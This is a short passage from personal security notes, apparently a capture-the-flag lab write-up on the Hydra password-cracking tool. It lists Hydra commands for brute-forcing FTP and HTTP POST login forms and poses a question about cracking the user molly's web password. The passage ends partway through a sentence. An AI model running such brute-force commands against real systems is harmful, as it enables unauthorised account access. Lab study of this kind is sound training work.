Fahim-p/securitynotes/src/site/notes/My Digital Garden.md

     - `hydra -l user -P passlist.txt [ftp://MACHINE_IP](ftp://MACHINE_IP)`
 - Another example
     - `hydra -l <username> -P <wordlist> 10.10.71.57 http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V`

+> [!Question]
+> **Use Hydra to bruteforce molly's web password.
+What is flag 1?**

+Going to the target IP address gives us a web login from with a username and password,